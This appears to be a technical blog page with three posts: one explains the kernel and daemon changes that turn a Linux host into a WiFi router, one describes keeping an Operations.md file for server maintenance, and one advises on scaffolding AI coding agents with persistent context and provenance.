A Survey of the 7 Configuration Changes That Turn a Multi-homed Linux Host into a Switch/Router

This was written on March 1, 2026

What does it mean to turn a Linux system into networking infrastructure?

I think it is incredibly cool that we can change a Linux system into a networking device. But have you ever wondered:

What are we changing when we turn a Linux system into a router or switch? What are we changing if we make a raspberry pi into a WiFi access point? How significant is the system performance monitoring change? What are the gates we have to change to enable packet forwarding and processing?

I’m going to start out with a narrative explanation of the changes that turn a Linux system into a WiFi access point and then I’ll show the commands for implementing it.

I have a cognitive bias: I think of networking devices and computers as different things. This is because the command line experience on networking gear is different than what you experience on servers/hosts. On servers and workstations: you tend to focus a lot on objects on the file system. On networking gear, you’re spending most of your time working with running processes directly. Commands and interaction objectives on networking gear is very different than those on hosts.

I suspect a lot of other people who have worked in networking have similar feelings about networking appliances versus host operating systems. This might be specific to my journey. But for better or worse, I felt that networking was different than general computing. It isn’t. If you know networking, you can make Linux do networking things if you make 7 changes.

  1. Activating IP Forwarding
  2. Defining The Bridge
  3. Activating nftables policies
  4. Stateful Firewalling with conntrack
  5. Defining NAT and Masquerade policies
  6. Vending DHCP and DNS with dnsmasq
  7. Vending WiFi networks with hostapd

To activate packet processing and forwarding in the Linux Kernel, you start by changing the Kernel’s configuration for networking. Every Android device that vends a personal WiFi hotspot makes the same general changes.

A packet’s journey through the kernel

Let’s assume we have a Linux machine with a single network interfaces. A packet arrives on the externally facing interface. The Network Interface Card (NIC) signals an interrupt and the driver pulls the frame into a ring buffer in kernel memory via Direct Memory Access (DMA), where the hardware writes data into RAM without Central Processing Unit (CPU) involvement. The kernel’s networking stack picks the frame up from there, strips the Ethernet header, and examines the Internet Protocol (IP) destination address.

At that point the kernel consults its routing table. If the destination address matches one of the machine’s own interfaces, the packet travels up through the network stack to a listening socket, to a process waiting to handle it. If the destination address matches no local interface and IP forwarding is disabled, the kernel drops the packet and increments a counter in /proc/net/snmp.

The default behavior of Linux is the end of the line for a packet: the kernel cannot forward the packet to another host. We need to make changes to the system if we want to enable routing. We also need another nic to send across network interfaces. A workstation is a host, not a router.

Now imagine that same system with two NICs (aka dual-homed)- how do we get closer to routing packets?

A router’s role is to forward the packets our single-homed host drops by default. Let’s explore each of the steps that move the kernel from a workstation’s conservative posture as a host into a router that routes packets, modifies packet headers, and filters traffic between interfaces.


What is a hook?

In the Linux kernel, a hook is a designated interception point in a code path where external functions can register themselves to execute. Think of it as a slot in an assembly line: the main process pauses at predefined points and runs every function that has registered at that slot, in priority order. Each registered function can inspect, modify, accept, or drop the item passing through. Hooks let the kernel separate its core packet-processing logic from policy decisions like filtering and address translation. The kernel defines where the hooks are; administrators and tools like nftables decide what code runs at each one. The kernel implements hooks as arrays of function pointers stored in structures like struct nf_hook_entries. At each hook point, the kernel iterates the array via nf_hook_slow(), passing each registered callback a pointer to the packet’s sk_buff structure.


Earlier, I made reference to “The kernel’s networking stack.” Just what does that mean?

A packet arrives at the NIC. The driver places it in memory and the kernel’s networking stack processes it through several ordered stages. At defined points along this path, the kernel passes the packet through netfilter, a hook-based framework built directly into the kernel’s networking code.

Netfilter hooks are function pointer arrays registered inside the kernel’s packet processing path. At each hook point, the kernel iterates through every registered function in priority order, passing a pointer to the packet’s socket buffer (sk_buff). Each registered function can accept, drop, modify, or queue the packet. Userspace tools like nftables register callback functions at these hooks by sending commands through a netlink socket, a kernel-userspace Inter-Process Communication (IPC) channel designed for networking configuration.

You can observe netfilter’s activity at runtime. nft list ruleset shows all currently registered tables and chains. conntrack -L shows the live connection tracking table. For deeper inspection, perf trace or bpftrace can attach probes to kernel functions like nf_hook_slow (the function the kernel calls when it iterates hook callbacks), letting you watch individual packet decisions in real time.

The five standard hook points are:

HookPosition in the packet path
PREROUTINGImmediately on arrival, before any routing decision
INPUTFor packets destined for a local process
FORWARDFor packets passing through the machine to another host
OUTPUTFor packets generated by local processes
POSTROUTINGJust before a packet leaves an interface

After PREROUTING, the kernel makes its routing decision. Packets addressed to the machine itself travel up through INPUT. Packets addressed to other hosts, when forwarding is enabled, move to FORWARD and then out through POSTROUTING. Every configuration step either registers code on one of these hooks or changes how the routing decision behaves.


Change 1: Activating IP Forwarding

IP forwarding is the first gate for enabling transport of packets across interfaces. Without it, the FORWARD hook might exist, but the kernel never sends packets to it. Packets arriving for foreign destinations die after the routing lookup. With it open, the kernel hands those packets to FORWARD, and every other piece of the router configuration takes effect.

You manage ip forwarding through the /etc/sysctl.d/10-forward.conf file:

/etc/sysctl.d/10-forward.conf

net.ipv4.ip_forward=1

/etc/sysctl.d/ is a drop-in configuration directory for kernel runtime parameters. At boot, systemd-sysctl.service reads every *.conf file in that directory (plus /etc/sysctl.conf) and writes each parameter to its corresponding path under /proc/sys/.

The kernel exposes a virtual filesystem at /proc/sys/ where every tuneable parameter appears as a file. The dotted sysctl notation is just a path translation: net.ipv4.ip_forward maps to /proc/sys/net/ipv4/ip_forward. Writing 1 to this file tells the IPv4 stack to send packets with non-local destinations through the FORWARD hook rather than discarding them. The kernel implements this decision in ip_forward() in net/ipv4/ip_forward.c.

Writing 1 to sysctl.d/10-forward.conf makes those writes persistent across reboots.

systemd-sysctl.service reads all files under /etc/sysctl.d/ at boot and applies them in lexicographic order. Restarting the service applies them immediately without requiring a system reboot. You can verify the active value at any time:

cat /proc/sys/net/ipv4/ip_forward

1 means forwarding is live. 0 means the gate is closed, and the rest of the router configuration is inert regardless of what else is configured.

Our first change is setting the kernel’s ip_forward parameter to 1.


Change 2: Defining The Bridge: Collapsing Two Interfaces Into One Segment

A home network serves both wired and wireless clients on the same subnet. The configuration creates a network bridge, br0, and attaches eth0 and wlan0 to it as member ports. For details on Linux bridge interfaces, see the kernel bridge documentation.

Our second change is defining a bridge and adding interfaces to it that bind them for passing packets.

A bridge operates at Layer 2, the Ethernet layer. The kernel’s bridge module maintains a Media Access Control (MAC) address forwarding table. When a frame arrives on eth0, the bridge looks up the destination MAC address in that table and forwards the frame to the port where that address was last seen. If the address is unknown, the bridge floods the frame to all member ports. The bridge expires learned associations after a configurable aging time. To the rest of the network, br0 appears as a single unified switch, one shared Layer 2 segment across both wired and wireless interfaces. The kernel implements bridge forwarding logic in br_forward() in net/bridge/br_forward.c.

This matters for routing because the kernel assigns IP addresses to interfaces, not to physical ports. Assigning 192.168.1.1 to br0 means the router holds a single Local Area Network (LAN) address regardless of whether a client is wired or wireless. Both interfaces carry traffic on the same subnet and communicate at Layer 2 without any routing decision required between them.

One important distinction: a wired interface like eth0 is enslaved to the bridge directly with a single command (ip link set eth0 master br0), and the kernel’s bridge module immediately begins learning MAC addresses from frames arriving on it. A wireless interface (wlan0) cannot be enslaved to the bridge this way.

The 802.11 protocol requires an association and authentication lifecycle that standard Ethernet bridging doesn’t account for. Instead, hostapd manages this relationship: the bridge=br0 directive in hostapd.conf instructs hostapd to attach wlan0 to the bridge once the interface is in AP mode. Wireless clients that associate with the AP are then visible to the bridge as if they were on a wired port. The result is the same unified L2 segment, but the path to get there is different for wired and wireless members.

Per https://wireless.docs.kernel.org/en/latest/en/users/documentation/hostapd.html:

The mac80211 subsystem moves all aspects of master mode into user space. It depends on hostapd to handle authenticating clients, setting encryption keys, establishing key rotation policy, and other aspects of the wireless infrastructure. Due to this, the old method of issuing iwconfig <wireless interface> mode master no longer works

On a standard Ethernet bridge port, any device that sends a frame gets its MAC learned — there’s no prior handshake required at L2. On an 802.11 AP, the MAC layer itself enforces that a client must complete authentication and association (State 3) before the AP will accept or forward its data frames. The AP’s MAC (managed by the driver via mac80211) is the gatekeeper, and it needs a userspace daemon (hostapd) to handle the authentication exchanges. The kernel’s bridge module has no knowledge of 802.11 states — it just sees frames — so it can’t manage this lifecycle on its own.

The bridge-utils package provides brctl for inspecting bridge state. The kernel handles all forwarding logic through the br_netfilter and bridge modules.

Aside: bridges and packet capture. A bridge port is an excellent place to insert a packet capture. Attach a third interface to br0 and mirror traffic to a tap device (for more on tap/tun virtual interfaces, see the kernel tuntap documentation), or use a standalone bridge with a port set to promiscuous mode feeding a capture daemon like tcpdump or Zeek. Because the bridge sees all frames on the segment before any routing or filtering decision, a capture at this layer sees the complete pre-Network Address Translation (NAT), pre-firewall traffic picture. Tools like tcpdump -i br0 or an AF_PACKET socket bound to the bridge interface work at line rate for most home and small-business traffic volumes. These tools max out on a default Linux kernel at around 18 Gbps (at least they did when I last tested them, around 2023). Higher line rates require tools with hardware-based filtering like the Data Plane Development Kit (DPDK) or eXpress Data Path (XDP).


Change 3: Activating nftables policies: Installing Code on the Hooks

Now that we have a bridge, we need to define packet processing rules via netfilter’s nftables.

Netfilter is the broader kernel-level packet filtering framework that provides the hooks into the network stack, while nftables (via nf_tables) is the modern packet classification engine that operates on top of those hooks. It replaced iptables as the preferred interface, but both ultimately rely on the same netfilter hook infrastructure in the kernel. The kernel implements the nf_tables subsystem in nf_tables_api.c in net/netfilter/.

The firewall and NAT rules in /etc/nftables.conf are callback registrations. nftables sends them to the kernel through a netlink socket, and the nf_tables subsystem installs them at the specified hooks. Each chain declaration names its hook and priority explicitly:

chain forward {
    type filter hook forward priority 0; policy drop;
    iifname "eth0" oifname "br0" ct state { established,related } counter accept
    iifname "br0"  oifname "eth0" ct state { new,established,related } counter accept
    counter
}

This chain controls traffic forwarding between interfaces, the core job of a router. Here’s what’s happening:

The chain definition:

type filter hook forward priority 0; policy drop;

This attaches to netfilter’s forward hook, meaning it only sees packets that aren’t destined for the router itself but need to pass through it. The default policy is drop, so anything not explicitly allowed is silently discarded. This is a deny-by-default posture.

In this WiFi AP setup, eth0 is the WAN-facing interface — the uplink to your ISP or upstream router. br0 is the LAN-facing bridge, which aggregates traffic from wired clients (if any are directly attached) and wireless clients managed by hostapd. All LAN traffic enters and exits through br0, regardless of whether it originated from a wired or wireless device. With that topology in mind, the two rules in the FORWARD chain map directly to the two directions of traffic flow across the router.

Rule 1: Wide Area Network (WAN) to LAN (return traffic only):

iifname "eth0" oifname "br0" ct state { established,related } counter accept

Traffic arriving from eth0 (the WAN/internet side) heading toward br0 (the LAN bridge) is only accepted if conntrack (ct state) shows the connection was already initiated from the LAN side. This means unsolicited inbound connections from the internet are blocked, exactly what you want from a NAT router/firewall.

Rule 2: LAN to WAN (outbound traffic):

iifname "br0" oifname "eth0" ct state { new,established,related } counter accept

Traffic from br0 heading out to eth0 is accepted for new connections as well as existing ones. This lets LAN clients freely initiate connections to the internet.

The trailing counter:

This is a catch-all counter with no action; it just counts packets that matched neither rule above (and will therefore be dropped by the policy). It’s useful for monitoring how much traffic is being rejected.

This is a classic “stateful” firewall pattern. LAN devices can reach the internet freely, but the internet can never initiate connections inward. The related state also allows things like Internet Control Message Protocol (ICMP) errors and File Transfer Protocol (FTP) data channels that are associated with an existing connection to pass through.

When nftables.service loads or reloads the configuration, it flushes the existing ruleset and installs the new one atomically through the netlink interface. No packet sees a partial ruleset during the transition. Reload with:

sudo systemctl reload nftables.service

Validate a configuration file before applying it:

sudo nft -c -f /etc/nftables.conf

If you are gonna dive deep into netfilter, this blog is outstanding

Our third change was defining nf_tables rules for processing packets.


Change 4: Stateful Firewalling with conntrack

The rule fragments ct state { established, related } and ct state { new, established, related } reference conntrack, the kernel’s connection tracking subsystem. Conntrack is what makes two simple rules sufficient to handle all legitimate traffic. The kernel implements the connection tracking core in nf_conntrack_core.c in net/netfilter/.

Conntrack watches traffic as it passes through netfilter and maintains a table of active flows. Each entry stores the source and destination addresses, ports, protocol, and current connection state. When a LAN client opens a Transmission Control Protocol (TCP) connection to a server on the internet, conntrack creates an entry and marks the flow new. Once the three-way handshake completes, conntrack marks it established. Reply packets from the internet match ct state established in the FORWARD chain and pass through automatically.

The firewall allows outbound connections from br0 to eth0 when they carry state new or established. Return packets arriving on eth0 match as established. Conntrack holds the bookkeeping; the firewall rules consult the table.

The related state covers secondary flows. Protocols like FTP open a control connection and then negotiate a separate data connection on a different port. ICMP error messages tie back to existing TCP or User Datagram Protocol (UDP) flows. Conntrack understands these relationships and marks the secondary flows accordingly, so the firewall accepts them without explicit rules for every protocol variant.

Our fourth change is an expansion of network connection tracking in the Kernel’s connection tracking subsystem. We have begun tracking packets for systems beyond just our own host.


Change 5: Defining NAT and Masquerade policies: Rewriting Addresses at the Border

Home networks use Request for Comments (RFC) 1918 private address space: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. The public internet carries routes to none of these ranges. Every packet leaving the LAN needs its source address replaced with the router’s public IP before it exits. Without that replacement, the originating host will never receive replies from the internet.

The postrouting chain at the POSTROUTING hook replaces each outbound packet’s private source address with the router’s public address:

chain postrouting {
    type nat hook postrouting priority 100; policy accept;
    oifname "eth0" counter masquerade
}

The term masquerade relates to the act of disguising oneself. The router pretends to be the original sender of a request bound for the internet, but it remembers which node on the internal network made the original request. The resource on the internet responds to the router as if it’s connecting with the original sender, but the router modifies the packet and sends it on to the original requester. The router presents the LAN client to the outside world under a different identity, the WAN IP, concealing the private address behind a public one. The client appears to the remote server as the router itself. The router hides the client’s original address. The kernel implements the masquerade action in nf_nat_masquerade.c in net/netfilter/.

Conntrack stores the translation as part of each flow’s entry. The tuple (private IP, private port, public IP, public port, protocol) lives in the conntrack table for the lifetime of the connection. You can inspect it directly:

sudo conntrack -L

Each line shows the original and reply tuples for a live flow, along with the connection state and a timeout countdown. Flows that have been idle long enough age out, and conntrack removes their entries, a key mechanism for preventing the NAT table from growing without bound. TCP connections time out after the session closes or after a configurable idle period. UDP entries use shorter timers because UDP carries no close signal.

The masquerade action reads eth0’s current IP address at the moment the packet is processed, rather than at configuration time. This makes it the correct choice for a WAN interface that acquires its address via Dynamic Host Configuration Protocol (DHCP), where the public IP may change without notice. When the address changes, new connections use the new address automatically. Conntrack retains entries for established connections under the old address until they expire.

Our fifth change is defining rules that modify the sender and recipient addresses in packets processed by the host.


Change 6: Vending DHCP and DNS with dnsmasq: Announcing the Router to New Clients

Every computer on the Internet needs to know three things to work: their IP address, their default gateway to the internet, and their Domain Name System (DNS) server.

A router must introduce itself to clients on their network. New clients arrive without an IP address, without a default gateway, and without a DNS resolver. dnsmasq vends these values to clients on their network through DHCP.

When a device joins the network, it broadcasts a DHCP discovery. dnsmasq listens on br0 and responds with an offer containing an IP address, subnet mask, lease duration, and two DHCP options: option 3 (default gateway, 192.168.1.1) and option 6 (DNS server, 192.168.1.1). Option 3 tells the client where to send packets destined for addresses outside the local subnet. Option 6 tells the client which resolver to query. dnsmasq caches upstream responses locally, reducing query volume and accelerating repeat lookups.

dnsmasq binds to br0 so it serves only the LAN. It never listens on eth0.

NetworkManager as an alternative: NetworkManager can handle both DHCP server and DNS functions through its built-in dnsmasq integration, activated by setting dns=dnsmasq in /etc/NetworkManager/NetworkManager.conf. NetworkManager launches its own dnsmasq instance and manages its configuration dynamically as interfaces come and go.

There are significant tradeoffs for each approach. NetworkManager’s approach reduces manual configuration and handles interface lifecycle events automatically. This is useful on a laptop or a machine where interfaces appear and disappear. On a dedicated router, you generally will want greater control. NetworkManager may reconfigure dnsmasq or restart it in response to network events, interrupting DHCP leases in unpredictable ways. A static dnsmasq configuration launched by systemd gives you deterministic startup order, explicit binding, and straightforward log inspection via journalctl -eu dnsmasq.service. You know exactly what the daemon is configured to do because you wrote the configuration file.

From a kernel perspective, both paths land in the same place: a userspace process bound to a UDP socket on port 67, servicing DHCP requests arriving on the bridge interface. The kernel doesn’t distinguish between the two arrangements. The difference is in how the daemon is launched, configured, and supervised. This is a service management and operational tradeoff, not an architectural one.

Our sixth change is deploying a new daemon (dnsmasq) for vending DHCP and DNS services to clients on the system’s network(s).


Change 7: Vending WiFi networks with hostapd: Switching the Wireless Card into Access Point (AP) Mode

Wireless interfaces operate in one of several modes. In managed mode, a card scans for access points and associates as a client. In AP mode, the card broadcasts beacons, accepts association requests, and manages the full authentication lifecycle for connecting devices.

The kernel’s mac80211 subsystem provides a unified programming interface for 802.11 hardware across different driver implementations. hostapd communicates with mac80211 through the nl80211 netlink interface, the same socket-based kernel-userspace channel that nftables uses, applied here to the wireless subsystem. Through nl80211, hostapd commands the driver to enter AP mode, sets the Service Set Identifier (SSID), channel, and Wi-Fi Protected Access 2 (WPA2) encryption parameters, and takes ownership of authentication frames.

The bridge=br0 directive in hostapd.conf attaches the AP interface to the bridge as a member port. Wireless clients, once associated, enter the same Layer 2 segment as wired clients. Their traffic arrives on br0, the kernel applies the same netfilter decisions, and packets travel the same forwarding path as everything else on the LAN.

Debian ships hostapd masked by default. Systemd registers the service but blocks it from starting. This blocking prevents an unconfigured instance from launching and broadcasting an open network. systemctl unmask hostapd removes that block, after which systemctl enable --now hostapd starts it and registers it for future boots.

Our seventh change is deploying a new daemon (hostapd) for vending WiFi networks from the device’s WiFi card.

The Result: A WiFi Router!

Each configuration step activates a different layer of the kernel’s networking architecture. Together, they build a complete forwarding system:

StepKernel mechanismLayer
ip_forward=1 via sysctlIPv4 stack enables FORWARD pathL3
br0 bridge * L2 L2 *
nftables FORWARD chainNetfilter hook, packet policyL3/L4
conntrackStateful connection tableL3/L4
masqueradeSource NAT at POSTROUTINGL3
dnsmasq DHCPGateway and DNS announcementApplication
hostapd via nl80211AP mode through mac80211L2 wireless

Note on the bridge row: Adding a wired interface to br0 is a direct kernel operation — the bridge module immediately takes over frame forwarding for that port. Adding a wireless interface is indirect: hostapd’s bridge=br0 directive handles the attachment after the wireless card enters AP mode and a client associates. Both result in the same logical L2 segment, but the mechanism differs. If you are debugging bridge membership, brctl show (or ip link show master br0) will show wired members directly; wireless clients appear as learned MAC entries in the bridge’s forwarding table once they associate, which you can inspect with brctl showmacs br0.

Start with a Linux machine in its default state: a workstation that receives packets for itself, forwards nothing, and drops traffic addressed to any IP it doesn’t own. Its IP forwarding gate is closed. Its netfilter FORWARD chain is empty. Its wireless card listens for beacons rather than broadcasting them. It has no DHCP server, no NAT table, and no bridge.

  • IP forwarding opens the gate for the possibility of routing.
  • The bridge collapses the wired and wireless interfaces into a single addressable domain.
  • The nftables chains install policy at the FORWARD hook, deciding what passes and what drops.
  • Conntrack feeds state information into those policy decisions, making simple rules work for complex traffic patterns.
  • Masquerade hides the LAN behind the router’s public identity and keeps a translation table in memory.
  • dnsmasq announces the router’s presence and hands every new client the information it needs to reach the outside world.
  • hostapd converts a client-mode radio into an access point.

These are the changes that transform a Linux system into a WiFi router. You can evaluate and inspect them through 6 commands:

  • cat /proc/sys/net/ipv4/ip_forward for forwarding state,
  • brctl show for bridge membership,
  • nft list ruleset for the active firewall policy,
  • conntrack -L for live flows and NAT mappings,
  • journalctl -eu dnsmasq.service for DHCP lease activity,
  • iw dev for wireless interface mode.

The Operations File: A Pattern for Establishing Maintainable Systems

Sometimes, you forget what you built.

Any complex system outgrows an operator’s memory. When you’re building a solution, you get a handful of services running and for the time we’re doing immediate development, you can hold the whole picture in your head. We know where the configs live, which ports map to what services & how to restart the occasionally hanging service. Then one evening something breaks and you realize you can’t remember whether the database runs in a container or as a systemd service. We’re not even sure which log to check first. We’re going to have to probe about for a while- and we’d rather be spending time with our kids.

I started writing operations diaries when I noticed how much time I was spending re-learning my own systems. Every time I needed to do some maintenance on an aging server, I started with twenty minutes of archaeology: I’d do some generic linux system fingerprinting to retrace how things are wired together, confirm which config controls what and eventually rediscover the decisions I had made a year ago.

I don’t do this much anymore. I’ve landed on a pattern that saves me from the archeology. I build and maintain a structured document (Operations.md) in the Home directory of systems I need to maintain. It sits in the Home directory of my system so it’s easy to quickly get re-acquainted as soon as I log into the system. Making this a permanent practice produces a way of enabling agents to engage with the server without any pre-conceived external context. It answers the questions I usually have when I sit down at the terminal:

  • What’s running on this system?
  • How do I check the health of the important components?
  • What do I do when something goes wrong? and
  • What has gone wrong before?

The operations file is a living document that evolves with the project.The file has the following sections:

Operations.md
├── Quick Reference (status checks, logs, restarts)
├── Architecture Overview (visual map + port table)
├── Services (Homebrew/systemd, launchd, Docker)
├── Hardware Specifications
├── Disk Layout & Usage
├── Network Configuration
├── Listening Ports
├── Scheduled Tasks
├── Remote Access Setup
├── Troubleshooting Guide
├── Configuration Locations
├── Backup Recommendations
├── Known Issues
└── Changelog

I built a tool that can generate a first draft of an operations file for you. It runs platform-native commands on macOS or Linux, collects real system data, and renders a structured Operations.md based on what the script discovers.

This post walks through the concepts behind my Operations.md file. I describe the the layout of the document. It’s optimized for rapid troubleshooting. I explain the problems each section solves and describes how to start building and maintaining an Operations.md file for systems you need to maintain.

How Do I Know Nothing Is Broken Right Now?

At the very top of the Operations.md file, I capture one command (or a short loop) that checks all critical services at once. Below that, I capture per-service checks for troubleshooting. Imagine a broad check that identifies a problem- we’re going to need to drill into the components that could produce the problem. I’ll need to do some open ended troubleshooting- but I always want to start with the broadest check first and the ability to drill into specifics second. If you go after a hunch too soon, you can end up wasting hours on the wrong problem. My operations file starts with guidance on how to quickly collect the state of services on the system:

Services often fail silently. A container can report “running” while the application inside has crashed. A database can be online but unable to accept writes because the disk is full. A scheduled job can fail every execution for weeks, but I won’t notice till I need its output.

I handle these risks with a general health check section: a set of commands we can run in sequence to verify that each component of the system has what it needs to perform their jobs.

A good health check tests the delivery experience that a service is supposed to facilitate. For a web application, that means hitting an endpoint and confirming a valid response. For a database, that means running a query. For an API, that means making a real request. Checking whether the process is alive tells us something, but not enough. “Is the process delivering its feature?” tells us whether the system is failing.

Next I need to get a conceptual lay of the land for services running on the system. My operations file addresses this with an architecture overview near the top. The document lists every service, how it was installed (container, systemd unit, native process), what port it listens on, and what it depends on. A diagram showing how traffic flows through the system works for understanding relationships. Both sections give two views of the same information, optimized for different questions. What software’s on this system vs what are the listening services & ports operating on the system?

When something breaks, I need to know what else might be affected. When I want to add a new service, I need to know which ports are already taken and which dependencies exist. Without an inventory, I am reasoning about a system I cannot fully describe.

Generally speaking- I always run the same set of discovery commands to figure out the state of the system. I find I don’t retain all of the commands I need for checking systemd, docker containers, nginx and other services. To overcome my failing memory- I use a python script to collect the discrete details of the system- and I use an AI agent to infer the details & rationale of the system. If the agent doesn’t get it right- I correct it and update the documentation.

With my current operating practices- I don’t have to keep dragging out my operations diaries to rediscover the state of the system. I can re-apply agents to maintain a self-updating Operations file that gives me the details I need for operating the system and troubleshooting/tuning the core services on the system.

I would recommend writing this section when the system is healthy and there is time to verify each entry. Run through the services, confirm the ports, confirm the install methods, trace the dependency chains. Writing documentation forces you to obtain a level of understanding that casual troubleshooting does not. We cannot write down how a service connects to its database without confirming we actually know which database it uses. The act of writing documentation helps you discover surprises.

How Do I Fix Things When It Does Break?

When something goes wrong, we need a way to diagnose the problem and a record of how similar problems were solved before.

I build the troubleshooting section from specific incidents, each following a pattern: symptoms observed, commands run to investigate, root cause found, fix applied. The most valuable entries are the ones written right after spending two hours solving a problem, while the details are still fresh. In the future, we’ll solve the same problem in five minutes.

I try to organize this section by symptom rather than by cause. When something breaks, I know what we are seeing (the service is unresponsive, the page returns an error, the log is full of a particular message). I don’t know why at this point. Entries organized by symptom let me match what I observe to a known pattern without knowing the components I need to check.

I try to capture the wrong turns too. If I spend thirty minutes investigating a configuration issue before discovering that the real problem was an upstream provider outage, that sequence belongs in the entry. Next time I see the same symptoms, I check the upstream provider first and save myself from unnecessary detours.

How Do I Know Something Is About to Break?

The operations file addresses potential failures with a section on what to watch and how to check it. For each item, we document the command to check current status.

Known Issues, Constraints, and Workarounds

Every system has compromises. A partition that turned out to be too small. A driver that behaves unpredictably under certain conditions. I capture these in a Known Issues section.

Keeping It Alive: The Operations File as a Living Document

An operations file written once and never updated becomes a liability that provides false confidence. We trust it, act on stale information that no longer reflects the system, and make things worse.

I update the file during all maintenance. When I add a service, I add it to the inventory before moving on to the next task. When I solve a problem, I write the troubleshooting entry while the details are fresh. When I discover a new constraint, I add it to known issues immediately. The file grows with the system instead of drifting away from it. I leverage coding agents to troubleshoot in new ways. I also use coding agents to update the documentation.

A changelog section anchors the document. Every significant change gets a dated entry describing what changed, why it changed, and what I learned in the process. The emphasis belongs on reasoning, because the reasoning behind a decision decays fastest. Capturing the time of the decision makes tech debt manageable.

Over time, this section becomes institutional memory. When I encounter a configuration I do not recognize, the changelog tells me when it was added and what problem it was solving. That context is the difference between “I should not touch this because I do not understand it” and “I understand why this is here and whether it still applies.”

Getting Started: What to Write Down First

If this all sounds like a lot- don’t panic. The scope of a complete operations file can feel paralyzing when you are starting from nothing. So don’t start with a target of completeness. Start from what you already know. Build it over time. Also- don’t start from scratch. I have a tool at the bottom of this post that you can use to do your own initial discovery.

Speedy navigation of expanding Markdown files

As the Operations file grows navigation will get harder. You can use a tool like mindmap-cli to generate a mind map from a markdown file. A mind map generated from the markdown source gives you a bird’s-eye view of the whole structure, collapsible and clickable, without maintaining a separate document. The markdown file itself is for depth. The mindmap is for orientation. Together they let someone operate the system without reading a thousand lines of operations manuals.

Build an Operations.md file for Your System

The tool I mentioned at the top, Operations Discovery Mechanism, automates the hardest part of getting started: the initial inventory. It collects real data from the system using platform-native commands (brew serviceslaunchctl, and lsof on macOS; systemctljournalctl, and ss on Linux), structures it as JSON, and renders a complete Operations.md with copy-paste ready commands for every service it finds.

Create an Operations directory in the home directory of your target system. clone the repository into it.

gh repo clone CaptainMcCrank/OperationsDiscoveryMechanism

The workflow takes two steps. First, you’ll run the collector script to produce a JSON snapshot of your system. Second, run the renderer to turn that snapshot into a structured markdown document. No dependencies beyond Python 3.9 and the standard library.

# macOS
python3 mac_system_info.py -o system_info.json
python3 generate_operations.py -o Operations.md

# Linux
python3 linux_system_info.py -o system_info.json

For richer documentation, feed the collected JSON to Claude Code with the prompt template embedded in the Readme. Claude can infer relationships between services, add descriptions of what each one does, and flag potential issues that the script collects but cannot interpret.

The operations.md file covers the architecture overview, the service inventory, the quick reference commands, the port map, and the disk layout. Over time, if you’re disciplined about updating the troubleshooting entries, known issues and changelog the document becomes extremely powerful. You’ll be able to hop back onto old systems with ease. You’ll be in a position to start doing interesting experiments with Agentic operations. You can now have agents logging into systems that can acquire context without spending tokens on system enumerations.

Defeating context fatigue with agentic scaffolding

I’ve been thinking about how to improve my agent workflows- and I’ve discovered that there is a productivity speed bump that you hit as you get more fearless with agentic development: You know the agents cannot be trusted to make the right call, so you review every decision.  This slows everything down.  

I think I’ve managed to step past this problem.  I wanted to share some observations about how one expereinces the cognitive speedbump that comes with multiple custom agents- and I some methods for overcoming these problems. If you have been brave enough to explore — dangerously-skip-permissions these problems may sound familiar.  

AI skepticism typically starts with doubt about the capability of models.  Over the last 3 months, there has been a wave of people recovering from end-of-year holiday tinkering with Claude.  People have discovered that frontier models are smart enough to deliver.  They can handle complexity. The models are continue to get better. Despite this- the challenge of context management is structural and it gets worse as projects grow.

You have probably noticed that as you do more work with AI agents, your time spent re-explaining a project to the agent increases. It might be that you’re re-delivering the project description you gave last session or relitigating an architectural decision from three sessions ago. Here’s a fun experience: A feature that was already built just got rebuilt, slightly wrong, because an agent with fresh context didn’t know it existed. 

You’ve done your initial project work with an agent and now you’re running out of context in the session.  You decide to start a new session and spend the first fifteen minutes re-establishing context. You describe your project. You explain what’s been built. You restate the requirements.  If you were clever at the end of your last session, you’re copying and pasting a “hand-off” prompt that the last session created. The agent begins. But its interpretation drifts slightly from where you left off, and you don’t notice until the output from your deployment/development run doesn’t quite fit the project.

You hand off work to multiple agents and discover (often too late) that one of your agents overwrote what another built. Nothing is tracking which agent created which files. You didn’t write in your dev log about why a particular approach was chosen over the alternatives. A decision made in session four gets silently reversed in session twelve, and the reversal breaks something that was working.

You fear going to sleep and forgetting what you did today. You find yourself holding the entire project in your head. Your diary has a lot of copy/paste from sessions so you can review the decisions you made.  You are the only thread of continuity between sessions. The agents are productive when you’re directing them, but the moment you step away, the project stalls. Or worse, it moves confidently in the wrong direction. 

Agentic development looks like it could reduce the human burden, but it relocates it. You stopped writing code and started repeating context. You stopped building features and started answering the same questions at the top of every session. What are we building? Where are we? What has been decided? What remains?

If these questions have become your daily ritual, the problem is not your agents. The problem is the absence of scaffolding around them.  Let’s discuss what outcomes we should produce that will get us out of this developer doom loop.

Agent features that defeat context fatigue

To move from superficial autonomy to something sustainable, repeatable, and auditable, your agents need to produce specific outcomes.  I’ve had some success with patterns that fix these problems.  These patterns can be evaluated as features that should be embedded in your agent flows.  If you invest in these patterns, it will produce conditions where your agents manage context in a way that takes away your burdens.  My recommendation is that you review the agents you’ve created and ask yourself how they can produce the following outcomes:

Persistent context across sessions. Project knowledge, state, and history must survive the session boundary without requiring a human to re-explain them. Context has been the first casualty of session-based development. It should be the first thing we protect. Your agents should write state to disk.  Stop holding project context in your mind.  How does your agent acquire project context?  How does your agent update the project’s context to project planning files as it works?

Explicit phase and progress awareness. An agent must know what phase the project currently occupies and what has already been accomplished before it takes action. Agents lack an innate sense of where they are. The absence of this awareness is the root of duplicated effort, skipped steps, and misplaced confidence.  Agents should log data about their current phase & development progress.  Your agents should review progress logs & development artifacts that help them understand where they are in the project’s development & deployment before doing any work.  How do your agents identify project status?  How do your agents make incremental edits to project status documents to reflect completed work?

Clear provenance and accountability. Every artifact needs a traceable author. In multi-agent systems, files appear and change and sometimes break. Without an ownership record, debugging becomes archaeology. You spend time reverse engineering authorship of a change instead of solving problems.  Make your agents implement git commits that document which agent was responsible for a change.  How do your agents make authorship of code auditable?

Preserved decision rationale. The reasoning behind decisions, including the alternatives considered and the tradeoffs accepted, must be captured and accessible to future agents. Decisions without rationale become immovable. Nobody changes what nobody understands, and nobody preserves what nobody remembers choosing.  When you build big enough projects with agents, you can become overcome with fear about changing an existing feature.  You can overcome this anxiety by building agents that document their decision logic.  Ensure that agents log the solutions they considered and the reasoning behind the solution they picked.  Evaluate how your agents can be updated to document what decisions they made and what solutions were considered.  

